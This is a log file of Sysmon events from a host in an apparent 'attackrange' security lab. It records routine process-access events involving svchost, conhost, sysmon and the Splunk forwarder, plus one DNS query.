{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3905,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3906,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3907,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3908,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3909,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3910,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3911,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3912,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.975\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.975","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","TargetProcessId":"4400","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3913,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:45.391\r\nProcessGuid: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nProcessId: 4596\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:55:45.391","ProcessGuid":"{41C8662E-2001-5F25-0000-0010C9D80500}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","EventReceivedTime":"2020-08-01 07:55:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
